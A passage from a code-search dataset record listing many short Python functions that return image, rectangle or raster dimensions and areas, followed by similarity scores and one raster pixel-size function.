core.PointF(1, 1)\n tr = self.transform().inverted()[0]\n p01 = tr.map(p0)\n p11 = tr.map(p1)\n return core.PointF(p11 - p01)", "def get_size(self):\n result_str = subprocess.check_output([\n ADB_EXECUTOR, '-s', self.device_id, 'shell',\n 'wm', 'size'\n ]).decode(DEFAULT_CHARSET)\n width, height = result_str.replace('\\n', '').replace('\\r', '').split(' ')[-1].split('x')\n return width, height", "def size(self):\n\n return self.width", "def dimensions(self) -> typing.Tuple[int, int]:\n dimensions = self.data[2]\n dimensions = re.findall(r'(\\d+)\\s+x\\s+(\\d+)\\s+M', dimensions.replace('-', '0'))\n return dimensions[0] if dimensions else (0, 0)", "def get_dimension_width(self):\n pass", "def getDim(self):\n return \"%dx%d\" % (self.rows, self.cols)", "def dimensions():", "def get_data_extent(self):\n x, y = self.xy[0], self.xy[1]\n w, h = self.width, self.height\n return x, y, w, h", "def getDimensions(self):\n return self._majax, self._minax, self._pa", "def dimensions(self) -> int:\n return pulumi.get(self, \"dimensions\")", "def get_dimension_height(self):\n pass", "def canvas_size(self):\r\n width = height = 0\r\n for image in self.images:\r\n x = image.x + image.absolute_width\r\n y = image.y + image.absolute_height\r\n if width < x:\r\n width = x\r\n if height < y:\r\n height = y\r\n return round_up(width), round_up(height)", "def get_detector_size(self):\n sensor=self._get_sensor_info()\n return sensor.nMaxWidth,sensor.nMaxHeight", "def dimension_size(self):\n return self._dim", "def getShape(self):\n if self.initDone:\n return self.pixelHeight,self.pixelWidth\n\n self._waitForInit()\n\n return self.pixelHeight,self.pixelWidth", "def __len__(self):\n return self.width * self.height", "def toPixels(self):\n return (self.tile * AxisDistance.tilesize) + self.pixel", "def area(self):\r\n return self.width * self.height", "def DoGetSize(self):\r\n\r\n return self._rect.width, self._rect.height", "def get_state_size(self) -> Tuple[int, int]:\n return self.height, self.width", "def get_current_resolution(self):\n return self.display_info[\"width\"], self.display_info[\"height\"]", "def get_dimensions(self):\n return self.lon_arr.shape", "def area(self):\n\t\treturn self.width * self.height", "def width(self) -> int:\n return self._image_data.width", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.__width * self.__height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def area(self):\n return self.width * self.height", "def get_target_dimensions(self):\n if self.target_height is None:\n self._calculate_target_dimensions()\n return int(self.target_width), int(self.target_height)", "def tile_size_2d(self):\n return 32.0, 32.0", "def __len__(self) -> int:\n return self.width * self.height", "def width(self):\n return _libsbml.Dimensions_width(self)", "def area(self):\n return (self.__width * self.__height)", "def area(self):\n return (self.__width * self.__height)", "def width(self):\n return self._get_mean_and_samples_attribute('width')", "def area(self):\n return 
self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def area(self):\n return self.__height * self.__width", "def getDimension(data):\r\n # open image for reading in binary mode\r\n\r\n # read the 2 bytes\r\n a = data[163:165]\r\n\r\n # calculate height\r\n height = (a[0] << 8) + a[1]\r\n\r\n # next 2 bytes is width\r\n a = data[165:167]\r\n\r\n # calculate width\r\n width = (a[0] << 8) + a[1]\r\n\r\n return (width, height)", "def area(self):\n return self._width * self._height", "def get_image_size(self):", "def pixelsize(self):\n if hasattr(self, \"_pixelsize\"):\n return self._pixelsize\n\n try:\n return self.header[\"PixSize\"] # [arcsec]\n except KeyError:\n try:\n return abs(self.header[\"CDELT1\"]) * 3600 # [deg] -> [arcsec]\n except KeyError:\n return None", "def _get_dimensions(self):\n corners = []\n for module in self.modules:\n for tile in module:\n corners.append(tile.corners())\n corners = np.concatenate(corners)[:, :2] / self._pixel_shape\n\n # Find extremes, add 1 px margin to allow for rounding errors\n min_xy = corners.min(axis=0).astype(int) - 1\n max_xy = corners.max(axis=0).astype(int) + 1\n\n size = max_xy - min_xy\n centre = -min_xy\n # Switch xy -> yx\n return tuple(size[::-1]), centre[::-1]", "def get_density(self):\n xpx, ypx = self.get_axes_pixelsize()\n\n xmin, xmax = self.axes.get_xlim()\n ymin, ymax = self.axes.get_ylim()\n width = xmax - xmin\n height = ymax - ymin\n\n return width / xpx, height / ypx", "def get_image_shape(self) -> Tuple[int, int]:\n x = self.header.get(\"Rows\")\n y = self.header.get(\"Columns\")\n if x is not None and y is not None:\n return (x // self.size, y // self.size)", "def GetDimensions(filename):\n with Image(filename=filename) as img:\n dimensions = (img.width, img.height)\n return(dimensions)", "def area(self):\n\n return self.__width * self.__height" ]
[ "0.7506064", "0.7479907", "0.7441489", "0.74142814", "0.7389819", "0.7367811", "0.73565596", "0.73126996", "0.72868365", "0.7277576", "0.72565204", "0.7253058", "0.72077274", "0.72069263", "0.71481836", "0.7120468", "0.7104735", "0.70551723", "0.7054781", "0.70520395", "0.7045539", "0.7022868", "0.70155936", "0.70155936", "0.6977367", "0.69575024", "0.6944623", "0.6929413", "0.6910823", "0.6899658", "0.689238", "0.6873743", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.68591344", "0.6854056", "0.6833276", "0.6830843", "0.6825155", "0.68158436", "0.68019533", "0.6787426", "0.6783572", "0.6743567", "0.67329556", "0.6702341", "0.66861486", "0.66801685", "0.6671783", "0.66553265", "0.66523576", "0.66421914", "0.6629218", "0.66253066", "0.6623292", "0.66197604", "0.6608857", "0.66083455", "0.65971553", "0.659455", "0.6589303", "0.6587672", "0.65810436", "0.658047", "0.6580235", "0.6580235", "0.6580235", "0.6580235", "0.6580235", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6573088", "0.6571182", "0.65707433", "0.6566482", "0.6558894", "0.65566564", "0.65566564", "0.65477437", "0.65453875", "0.65453875", "0.65453875", "0.65435326", "0.65427756", "0.6540359", "0.6537701", "0.6531522", "0.6530893", "0.6529505", "0.65264636", "0.652547" ]
0.77364904
0
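The GetPixelDimensions document above leans on GDAL's six-element geotransform, in which index 1 is the pixel width and index 5 the pixel height (typically negative for north-up rasters). A minimal standalone sketch of the same idea, assuming the GDAL Python bindings and a hypothetical raster path:

    from osgeo import gdal

    ds = gdal.Open("example.tif")  # hypothetical path
    # Geotransform layout: (origin_x, pixel_width, row_rotation,
    #                       origin_y, col_rotation, pixel_height)
    _, pixel_width, _, _, _, pixel_height = ds.GetGeoTransform()
    print(pixel_width, abs(pixel_height))  # pixel size in the dataset's units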
Transforms pixel coordinates into the destination projection. If transform is None, no reprojection occurs and the dataset's SpatialReference is used.
def PixelCoordinates(self, x, y, transform=None):
    # Assert that pixel_x and pixel_y are valid
    if not 0 <= x <= self.RasterXSize:
        raise ValueError('x %r is not between 0 and %d' % (x, self.RasterXSize))
    if not 0 <= y <= self.RasterYSize:
        raise ValueError('y %r is not between 0 and %d' % (y, self.RasterYSize))
    geotransform = self.GetGeoTransform()
    coords = XY(
        geotransform[0] + geotransform[1] * x + geotransform[2] * y,
        geotransform[3] + geotransform[4] * x + geotransform[5] * y
    )
    if transform is None:
        return coords
    # Reproject
    return XY(*transform.TransformPoint(coords.x, coords.y)[0:2])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _reproject(ds, dst_crs=None, dst_transform=None, width=None, height=None,\n res=None, extent=None, **kwargs):\n\n if 'resampling' not in kwargs:\n kwargs['resampling'] = rasterio.warp.Resampling.cubic\n\n src_crs = get_crs(ds)\n src_bounds = get_bounds(ds)\n if extent is not None:\n extent = BoundingBox(*extent)\n\n #\n # Only allow inferring of width or height from aspect ratio\n # if the CRS is not changed.\n #\n if dst_crs is None:\n dst_crs = src_crs\n if width is None and height is not None:\n width = int(ncols(ds) * height / nrows(ds))\n elif height is None and width is not None:\n height = int(nrows(ds) * width / ncols(ds))\n\n # Given: transform, shape\n # Given: transform, extent\n # Given: res, extent\n # Given: shape, res\n # Given: shape, extent\n\n if dst_transform is not None:\n #\n # If the transform is given, we also need the width and height or\n # the extent.\n #\n if width is not None and height is not None:\n pass\n elif extent is not None:\n # Calculate width and height from extent\n width = int(abs(\n (extent.right - extent.left) / dst_transform.a)) + 1\n height = int(abs(\n (extent.top - extent.bottom) / dst_transform.e)) + 1\n else:\n raise ValueError('Not enough information provided.')\n\n elif extent is not None:\n #\n # Transform can be calculated from extent, if either width and height\n # or the resolution are given.\n #\n if res is not None:\n width = int(abs(\n (extent.right - extent.left) / res[0])) + 1\n height = int(abs(\n (extent.top - extent.bottom) / res[1])) + 1\n\n # The following doesn't give the correct result.\n dst_transform = rasterio.transform.from_bounds(\n *extent, width=width-1, height=height-1\n )\n\n else:\n #\n # If neither the transform nor the extent are given, infer the best\n # possible parameters from the width, height, and the resolution.\n #\n dst_transform, width, height = \\\n rasterio.warp.calculate_default_transform(\n src_crs, dst_crs,\n ncols(ds), nrows(ds),\n resolution=res,\n dst_width=width,\n dst_height=height,\n **src_bounds._asdict())\n\n src_transform = get_transform(ds)\n src_dims = get_dims(ds)\n dst_crs = _parse_crs(dst_crs)\n\n #\n # Prepare new x and y coordinate arrays\n #\n dst_x, _ = dst_transform * (np.arange(width), np.zeros(width, dtype=int))\n _, dst_y = dst_transform * (np.zeros(height, dtype=int), np.arange(height))\n dst_coords = {'x': dst_x, 'y': dst_y}\n\n #\n # Handle the case where there are extra dimensions, e.g. 
'time'\n # or 'band'\n #\n extra_dims = src_dims.keys() - {'y', 'x'}\n if len(extra_dims) == 0:\n dst_shape = (height, width)\n dst_dims = ('y', 'x')\n elif len(extra_dims) == 1:\n extra_dim = extra_dims.pop()\n dst_shape = (src_dims[extra_dim], height, width)\n dst_dims = (extra_dim, 'y', 'x')\n dst_coords[extra_dim] = ds.coords[extra_dim]\n else:\n raise ValueError('More than three dimensions are not supported.')\n\n def _reproject_da(da, shape):\n #\n # Reproject a single data array\n #\n extra_dims = set(da.dims) - {'y', 'x'}\n dim_order = tuple(extra_dims) + ('y', 'x')\n values = da.transpose(*dim_order).values\n output = np.zeros(shape, dtype=da.dtype)\n output[:] = np.nan\n\n # Fix data shape for one-dimensional data\n if da.ndim == 1:\n #\n # NOTE: The stretch factor is necessary because the input data\n # must extend at least half an original resolution cell in the\n # independent dimension.\n #\n if da.dims == ('x',):\n stretch_x = int((~src_transform * dst_transform).a / 2 + 1)\n values = np.vstack([values] * stretch_x)\n output.shape = (1,) + output.shape\n elif da.dims == ('y',):\n stretch_y = int((~src_transform * dst_transform).e / 2 + 1)\n values = np.vstack([values] * stretch_y).T\n output.shape = output.shape + (1,)\n\n rasterio.warp.reproject(\n values,\n output,\n src_transform=src_transform,\n src_crs=src_crs,\n dst_transform=dst_transform,\n dst_crs=dst_crs,\n dst_nodata=np.nan,\n **kwargs\n )\n\n # Final reshape in case the input was one-dimensional\n return output.reshape(shape)\n\n if isinstance(ds, xr.Dataset):\n result = xr.Dataset(coords=dst_coords)\n\n #\n # Also reproject coordinate arrays that are defined over\n # x and y\n #\n for v in ds.coords:\n #\n # If the projection is the same, also reproject coordinate arrays\n # that are defined over only one variable.\n #\n if dst_crs == src_crs and v not in ds.dims:\n if ds.coords[v].dims == ('x',):\n result.coords[v] = \\\n (('x',), _reproject_da(ds.coords[v], (width,)))\n elif ds.coords[v].dims == ('y',):\n result.coords[v] = \\\n (('y',), _reproject_da(ds.coords[v], (height,)))\n\n if not set(ds.coords[v].dims).issuperset({'x', 'y'}):\n continue\n\n shape = (height, width)\n result.coords[v] = (('y', 'x'),\n _reproject_da(ds.coords[v], shape))\n\n #\n # Reproject the actual data\n #\n for v in ds.data_vars:\n if set(ds[v].dims) == set(dst_dims):\n result[v] = (dst_dims, _reproject_da(ds[v], dst_shape))\n elif set(ds[v].dims) == {'y', 'x'}:\n shape = (height, width)\n result[v] = (dst_dims, _reproject_da(ds[v], shape))\n else:\n result[v] = (ds[v].dims, ds[v])\n\n #\n # Create lat and lon coordinates\n #\n # if 'lat' in ds.coords and 'lon' in ds.coords:\n # lon, lat = rasterio.warp.transform(\n # src_crs, dst_crs, ds.coords['x'], ds.coords['y'])\n # result.coords['lon'] = (('x',), lon)\n # result.coords['lat'] = (('y',), lat)\n\n elif isinstance(ds, xr.DataArray):\n result = xr.DataArray(_reproject_da(ds, dst_shape), dims=dst_dims,\n coords=dst_coords, name=ds.name)\n\n result.attrs = ds.attrs\n\n # Serialize transform to tuple and store in metadata\n result.attrs['transform'] = dst_transform[:6]\n # Store CRS info in metadata\n result.attrs['crs'] = dst_crs.to_string()\n result.attrs['coordinate_system_string'] = dst_crs.wkt\n # Store new data shape in metadata\n result.attrs['lines'] = nrows(result)\n result.attrs['samples'] = ncols(result)\n\n _add_latlon(result)\n\n return result", "def reproject(self, lon, lat):\n if self.xform is None:\n # if the CRS hasn't been determined yet, we set it from the first 
image's lat/lon (take the UTM crs)\n utm_i = str(int(math.floor((self.images[0].lon + 180) / 6 ) % 60) + 1).zfill(2)\n epsg_code = int('326' + utm_i) if (self.images[0].lat >= 0) else int('327' + utm_i)\n self.crs_dest = QgsCoordinateReferenceSystem(epsg_code)\n self.xform = QgsCoordinateTransform(self.crs_src, self.crs_dest, QgsProject.instance())\n return self.xform.transform(QgsPointXY(lon, lat))", "def apply(self, ds):\n\n return _reproject(ds, dst_crs=self.crs, dst_transform=self.transform,\n width=self.width, height=self.height, res=self.res,\n extent=self.extent, **self.kwargs)", "def reproject(\n self,\n dst_crs=None,\n dst_res=None,\n dst_transform=None,\n dst_width=None,\n dst_height=None,\n dst_nodata=None,\n method=\"nearest\",\n align=False,\n ):\n\n def _reproj(da, **kwargs):\n return da.raster._reproject(**kwargs)\n\n # parse and check destination grid and crs\n dst_crs = self._dst_crs(dst_crs)\n dst_transform, dst_width, dst_height = self._dst_transform(\n dst_crs, dst_res, dst_transform, dst_width, dst_height, align\n )\n reproj_kwargs = dict(\n dst_crs=dst_crs,\n dst_transform=dst_transform,\n dst_width=dst_width,\n dst_height=dst_height,\n )\n # gdal resampling method with exception for index based resampling\n method = method.lower()\n if method == \"nearest_index\":\n index = self.nearest_index(**reproj_kwargs)\n return self.reindex2d(index, dst_nodata)\n # update reproject settings\n if dst_nodata is None:\n dst_nodata = self.nodata if self.nodata is not None else np.nan\n reproj_kwargs.update(method=method, dst_nodata=dst_nodata)\n if self._obj.chunks is None:\n da_reproj = _reproj(self._obj, **reproj_kwargs)\n else:\n # create template with dask data\n dst_coords = {\n d: self._obj.coords[d]\n for d in self._obj.dims\n if d not in [self.x_dim, self.y_dim]\n }\n coords = gis_utils.affine_to_coords(\n dst_transform,\n (dst_height, dst_width),\n x_dim=self.x_dim,\n y_dim=self.y_dim,\n )\n dst_coords.update(coords)\n da_temp = full(\n dst_coords,\n nodata=dst_nodata,\n dtype=self._obj.dtype,\n name=self._obj.name,\n attrs=self._obj.attrs,\n crs=dst_crs,\n lazy=True,\n shape=(dst_height, dst_width)\n if self.dim0 is None\n else (self._obj.shape[0], dst_height, dst_width),\n dims=self.dims if self.dim0 is None else (self.dim0, *self.dims),\n )\n # no chunks on spatial dims\n chunksize = max(self._obj.chunks[0])\n chunks = {d: chunksize if d == self.dim0 else -1 for d in self._obj.dims}\n _da = self._obj.chunk(chunks)\n da_temp = da_temp.chunk(chunks)\n da_reproj = _da.map_blocks(_reproj, kwargs=reproj_kwargs, template=da_temp)\n da_reproj.raster.set_crs(dst_crs)\n return da_reproj.raster.reset_spatial_dims_attrs()", "def geotransform(self):\n return self.dataset.GetGeoTransform() if self.dataset else None", "def reproject(self, spatial_reference, transformation=None, inplace=False):\r\n if HASARCPY:\r\n if isinstance(spatial_reference, arcpy.SpatialReference):\r\n wkt = spatial_reference.exportToString()\r\n wkid = spatial_reference.factoryCode\r\n if wkid:\r\n sr = _types.SpatialReference({'wkid' : wkid})\r\n elif wkt:\r\n sr = _types.SpatialReference({'wkt': wkt})\r\n else:\r\n sr = None\r\n elif isinstance(spatial_reference, int):\r\n sr = _types.SpatialReference({'wkid' : spatial_reference})\r\n elif isinstance(spatial_reference, string_types):\r\n sr = _types.SpatialReference({'wkt' : spatial_reference})\r\n elif isinstance(spatial_reference, _types.SpatialReference):\r\n sr = spatial_reference\r\n else:\r\n raise ValueError(\"spatial_referernce must be of type: int, 
string, _types.SpatialReference, or arcpy.SpatialReference\")\r\n\r\n if inplace:\r\n df = self\r\n else:\r\n df = self.copy()\r\n sarcpy = sr.as_arcpy\r\n if sarcpy:\r\n geom = df.geometry.project_as(sarcpy, transformation)\r\n geom.sr = sr\r\n df.geometry = geom\r\n if inplace:\r\n return df\r\n else:\r\n raise Exception(\"could not reproject the dataframe.\")\r\n return df", "def reproject(dataset, epsg):\n dataclass = dataset.__class__.__name__\n # Run appropriate reprojection method\n if dataclass == 'GeoDataFrame':\n repro = geopandas.GeoDataFrame.copy(dataclass)\n repro[repro.geometry.name] = repro.geometry.to_crs(epsg=epsg)\n repro.crs = fiona.crs.from_epsg(epsg)\n elif dataclass == 'Dataset':\n repro = gdal_reproject(dataset, '', epsg=epsg)\n return repro", "def reproject_dataset_example(dataset, dataset_example, method=1):\n # open dataset that must be transformed\n try:\n if (os.path.splitext(dataset)[-1] == '.tif' or os.path.splitext(dataset)[-1] == '.TIF'):\n g = gdal.Open(dataset)\n else:\n g = dataset\n except:\n g = dataset\n epsg_from = Get_epsg(g)\n\n #exceptions\n if epsg_from == 9001:\n epsg_from = 5070\n\n # open dataset that is used for transforming the dataset\n try:\n if (os.path.splitext(dataset_example)[-1] == '.tif' or os.path.splitext(dataset_example)[-1] == '.TIF'):\n gland = gdal.Open(dataset_example)\n epsg_to = Get_epsg(gland)\n else:\n gland = dataset_example\n epsg_to = Get_epsg(gland)\n except:\n gland = dataset_example\n epsg_to = Get_epsg(gland)\n\n # Set the EPSG codes\n osng = osr.SpatialReference()\n osng.ImportFromEPSG(epsg_to)\n wgs84 = osr.SpatialReference()\n wgs84.ImportFromEPSG(epsg_from)\n\n # Get shape and geo transform from example\n geo_land = gland.GetGeoTransform()\n col=gland.RasterXSize\n rows=gland.RasterYSize\n\n # Create new raster\n mem_drv = gdal.GetDriverByName('MEM')\n dest1 = mem_drv.Create('', col, rows, 1, gdal.GDT_Float32)\n dest1.SetGeoTransform(geo_land)\n dest1.SetProjection(osng.ExportToWkt())\n\n # Perform the projection/resampling\n if method == 1:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_NearestNeighbour)\n if method == 2:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_Bilinear)\n if method == 3:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_Lanczos)\n if method == 4:\n gdal.ReprojectImage(g, dest1, wgs84.ExportToWkt(), osng.ExportToWkt(), gdal.GRA_Average)\n \n return(dest1)", "def imageTransform(self):\n ims = self.imageShape\n acs = self.activeShape\n dx = self.colVector\n dy = self.rowVector\n\n p0 = self.activeOrigin\n p1 = p0 + acs[2] * dx\n p2 = p0 + acs[1] * dy\n\n # print p0, p1, p2\n # print acs, dx, dy\n\n localPts = list(map(pg.Vector, [[0,0], [ims[2],0], [0,ims[1]], [0,0,1]])) # w and h of data of image in pixels.\n globalPts = list(map(pg.Vector, [p0, p1, p2, [0,0,1]]))\n m = pg.solve3DTransform(localPts, globalPts)\n m[:,2] = m[:,3]\n m[2] = m[3]\n m[2,2] = 1\n tr = Qt.QTransform(*m[:3,:3].transpose().reshape(9))\n return tr", "def geo_transform(self):\n pass", "def TransformPoint(*args, **kwargs):\n return _gdi_.GraphicsMatrix_TransformPoint(*args, **kwargs)", "def _getGeoTransform(self):\n with self._getDatasetLock:\n gt = self.dataset.GetGeoTransform()\n if (self.dataset.GetGCPProjection() and self.dataset.GetGCPs()):\n gt = gdal.GCPsToGeoTransform(self.dataset.GetGCPs())\n return gt", "def warp(\r\n self,\r\n dst_crs,\r\n resampling_method=0,\r\n num_threads=4,\r\n resolution=None,\r\n 
nodata=None,\r\n target_align=None,\r\n ):\r\n if target_align:\r\n transform = target_align.dataset.transform\r\n width = target_align.dataset.width\r\n height = target_align.dataset.height\r\n\r\n else:\r\n if resolution:\r\n transform, width, height = rasterio.warp.calculate_default_transform(\r\n self.dataset.crs,\r\n dst_crs,\r\n self.dataset.width,\r\n self.dataset.height,\r\n *self.dataset.bounds,\r\n resolution=resolution,\r\n )\r\n else:\r\n transform, width, height = rasterio.warp.calculate_default_transform(\r\n self.dataset.crs,\r\n dst_crs,\r\n self.dataset.width,\r\n self.dataset.height,\r\n *self.dataset.bounds,\r\n )\r\n\r\n destination = np.zeros((self.dataset.count, height, width), self.__arr.dtype)\r\n\r\n self.__arr, transform = rasterio.warp.reproject(\r\n source=self.__arr,\r\n destination=destination,\r\n src_transform=self.dataset.transform,\r\n src_crs=self.dataset.crs,\r\n src_nodata=nodata,\r\n dst_transform=transform,\r\n dst_crs=dst_crs,\r\n dst_nodata=nodata,\r\n resampling=resampling_method,\r\n num_threads=num_threads,\r\n )\r\n\r\n self.__update_dataset(dst_crs, transform, nodata=nodata)", "def transform(self, x, y):\n # return self.transform_2D(x, y)\n return self.transform_perspective(x, y)", "def transform(self, x, y, z=None, crs=wgs84, nearest=False, maskout=False):\n\n x, y = np.ma.array(x), np.ma.array(y)\n\n # First to local proj\n _crs = check_crs(crs, raise_on_error=True)\n if isinstance(_crs, pyproj.Proj):\n x, y = transform_proj(_crs, self.proj, x, y)\n elif isinstance(_crs, Grid):\n x, y = _crs.ij_to_crs(x, y, crs=self.proj)\n\n # Then to local grid\n x = (x - self.x0) / self.dx\n y = (y - self.y0) / self.dy\n\n # See if we need to round\n if nearest:\n f = np.rint if self.pixel_ref == 'center' else np.floor\n x = f(x).astype(int)\n y = f(y).astype(int)\n\n # Mask?\n if maskout:\n if self.pixel_ref == 'center':\n mask = ~((x >= -0.5) & (x < self.nx-0.5) &\n (y >= -0.5) & (y < self.ny-0.5))\n else:\n mask = ~((x >= 0) & (x < self.nx) &\n (y >= 0) & (y < self.ny))\n x = np.ma.array(x, mask=mask)\n y = np.ma.array(y, mask=mask)\n\n return x, y", "def dataTransform(self):\n # Might eventually need to account for downsampling / clipping here\n # transforms are updated in setOpts call.\n return self._dataTransform", "def _project(self):\n ghosts_w = self.input_field.topology.ghosts()\n self.input_field.data[0], self.input_field.data[1], \\\n self.input_field.data[2] = \\\n fftw2py.projection_om_3d(self.input_field.data[0],\n self.input_field.data[1],\n self.input_field.data[2], ghosts_w)", "def _apply_transform(self, img: np.ndarray): \n img = self.transform(image=img)[\"image\"]\n return img", "def _apply_transform(self, img: np.ndarray): \n img = self.transform(image=img)[\"image\"]\n return img", "def projection(self, point):\n return gs.copy(point)", "def apply_projection_transform(Xb, batch_size, image_size):\n d = image_size * 0.3 * intensity\n for i in np.random.choice(batch_size, int(batch_size * p), replace = False): \n tl_top = random.uniform(-d, d) # Top left corner, top margin\n tl_left = random.uniform(-d, d) # Top left corner, left margin\n bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin\n bl_left = random.uniform(-d, d) # Bottom left corner, left margin\n tr_top = random.uniform(-d, d) # Top right corner, top margin\n tr_right = random.uniform(-d, d) # Top right corner, right margin\n br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin\n br_right = random.uniform(-d, d) # Bottom right corner, 
right margin\n\n transform = ProjectiveTransform()\n transform.estimate(np.array((\n (tl_left, tl_top),\n (bl_left, image_size - bl_bottom),\n (image_size - br_right, image_size - br_bottom),\n (image_size - tr_right, tr_top)\n )), np.array((\n (0, 0),\n (0, image_size),\n (image_size, image_size),\n (image_size, 0)\n )))\n Xb[i] = warp(Xb[i], transform, output_shape=(image_size, image_size), order = 1, mode = 'edge')\n\n return Xb", "def TransformPoint(transform, x, y, z):\n result = np.matmul(transform, np.array([x, y, z, 1.]))\n return result[0], result[1], result[2]", "def transform_point(transform, x_in, y_in):\n # create point geometry from coordinates\n point = ogr.Geometry(ogr.wkbPoint)\n point.AddPoint(x_in, y_in)\n point.Transform(transform)\n\n x_out = point.GetX()\n y_out = point.GetY()\n return x_out, y_out", "def reproject_coordinates(x_in, y_in, spatial_reference_source, spatial_reference_target=None): \n if spatial_reference_target is not None:\n pass\n else:\n spatial_reference_target = osr.SpatialReference()\n spatial_reference_target.ImportFromEPSG(4326) \n pass\n \n if int(osgeo.__version__[0]) >= 3:\n # GDAL 3 changes axis order: https://github.com/OSGeo/gdal/issues/1546\n \n spatial_reference_source.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER)\n spatial_reference_target.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER)\n\n \n pTransform = osr.CoordinateTransformation( spatial_reference_source, spatial_reference_target)\n \n x_new,y_new, z = pTransform.TransformPoint( x_in,y_in)\n \n return x_new,y_new", "def apply_transform(transform):\n vg.shape.check(locals(), \"transform\", (4, 4))\n\n def apply(points, discard_z_coord=False, treat_input_as_vector=False):\n points, is_columnized, maybe_decolumnize = columnize(\n points, (-1, 3), name=\"points\"\n )\n\n homogenous_coordinate_value = 0 if treat_input_as_vector else 1\n padded_points = np.pad(\n points,\n ((0, 0), (0, 1)),\n mode=\"constant\",\n constant_values=homogenous_coordinate_value,\n )\n transformed_padded_points = np.dot(transform, padded_points.T).T\n transformed_points = np.delete(transformed_padded_points, 3, axis=1)\n\n result = maybe_decolumnize(transformed_points)\n if discard_z_coord:\n return result[:, 0:2] if is_columnized else result[0:2]\n else:\n return result\n\n return apply", "def geotransform(self):\n return self._geotransform", "def Reproject(x, y, in_grid = 4326, out_grid = 32737):\n \n inProj = Proj(init='epsg:'+str(in_grid))\n outProj = Proj(init='epsg:'+str(out_grid))\n \n \n x2,y2 = transform(inProj,outProj,x,y)\n \n return x2, y2", "def transform_to(self, dst_crs):\n self.nodes.transform_to(dst_crs)", "def transform_proj(p1, p2, x, y, nocopy=False):\n\n try:\n # This always makes a copy, even if projections are equivalent\n return _transform_internal(p1, p2, x, y, always_xy=True)\n except TypeError:\n if proj_is_same(p1, p2):\n if nocopy:\n return x, y\n else:\n return copy.deepcopy(x), copy.deepcopy(y)\n\n return _transform_internal(p1, p2, x, y)", "def _transform(self, dataset):\n raise NotImplementedError()", "def get_transform(ds):\n\n if 'transform' in ds.attrs:\n ds_trans = ds.attrs['transform']\n if isinstance(ds_trans, Affine):\n return ds_trans\n else:\n return Affine(*ds_trans)\n\n elif 'crs' in ds.data_vars and 'i2m' in ds.data_vars['crs'].attrs:\n transf_str = ds.data_vars['crs'].attrs['i2m']\n a = list(map(float, transf_str.split(',')))\n return Affine(a[0], a[2], a[4], a[1], a[3], a[5])\n\n else:\n resx, resy = get_resolution(ds)\n xoff = 
ds['x'].values.min()\n yoff = ds['y'].values.max()\n return Affine(resx, 0, xoff, 0, resy, yoff)", "def _apply_transform(self, x, transform_parameters):\n # x is a single image, so it doesn't have image number at index 0\n img_row_axis = self.row_axis - 1\n img_col_axis = self.col_axis - 1\n img_channel_axis = self.channel_axis - 1\n\n x = apply_affine_transform(x, transform_parameters.get('theta', 0),\n transform_parameters.get('tx', 0),\n transform_parameters.get('ty', 0),\n transform_parameters.get('shear', 0),\n transform_parameters.get('zx', 1),\n transform_parameters.get('zy', 1),\n row_axis=img_row_axis,\n col_axis=img_col_axis,\n channel_axis=img_channel_axis,\n fill_mode=self.fill_mode,\n cval=self.cval)\n\n if transform_parameters.get('channel_shift_intensity') is not None:\n x = apply_channel_shift(x,\n transform_parameters['channel_shift_intensity'],\n img_channel_axis)\n\n if transform_parameters.get('flip_horizontal', False):\n x = self._flip_axis(x, img_col_axis)\n\n if transform_parameters.get('flip_vertical', False):\n x = self._flip_axis(x, img_row_axis)\n\n if transform_parameters.get('brightness') is not None:\n x = apply_brightness_shift(x, transform_parameters['brightness'])\n\n return x", "def projection(self):\n return self.dataset.GetProjection() if self.dataset else None", "def reproject(point):\n wgs84 = pyproj.Proj('+init=epsg:4326')\n native = pyproj.Proj(DEM_PROJECTION)\n x, y = pyproj.transform(wgs84, native, point.x, point.y)\n return geom.Point(x, y)", "def transform(dataset):\n\n from tomviz import utils\n import scipy.ndimage\n import numpy as np\n import warnings\n\n array = dataset.active_scalars\n\n zoom = (0.5, 0.5, 1)\n result_shape = utils.zoom_shape(array, zoom)\n result = np.empty(result_shape, array.dtype, order='F')\n # Downsample the dataset x2 using order 1 spline (linear)\n warnings.filterwarnings('ignore', '.*output shape of zoom.*')\n scipy.ndimage.interpolation.zoom(array, zoom,\n output=result,\n order=1,\n mode='constant',\n cval=0.0, prefilter=False)\n\n # Set the result as the new scalars.\n dataset.active_scalars = result", "def projective_transform(self, x):\n\n x = np.asarray(x)\n # Assume no intensity column\n x0, y0, z0 = x\n\n # Camera coors to pixel coors\n u = ((x0 / z0) * self.f) + (self.sensor_size[0] // 2)\n v = ((y0 / z0) * self.f) + (self.sensor_size[1] // 2)\n\n u_min = np.min(u)\n v_min = np.min(v)\n\n n = len(u)\n u_list = []\n v_list = []\n if self.error_on_oob:\n for i in range(n):\n if (u[i] >= u_min and u[i] <= self.sensor_size[0] and v[i] >= v_min and v[i] <= self.sensor_size[1]):\n u_list.append(u[i])\n v_list.append(v[i])\n else:\n raise OutOfSensorBoundsError(\"Projected coordinate was outside the sensor\")\n else:\n for i in range(n):\n u_list.append(u[i])\n v_list.append(v[i])\n\n u = np.asarray(u_list)\n v = np.asarray(v_list)\n\n return np.vstack((u, v))", "def apply_transform(img,\n transform_matrix):\n rows,cols = img.shape[:2]\n dst = cv2.warpAffine(img,transform_matrix,(cols,rows))\n\n\n return dst", "def 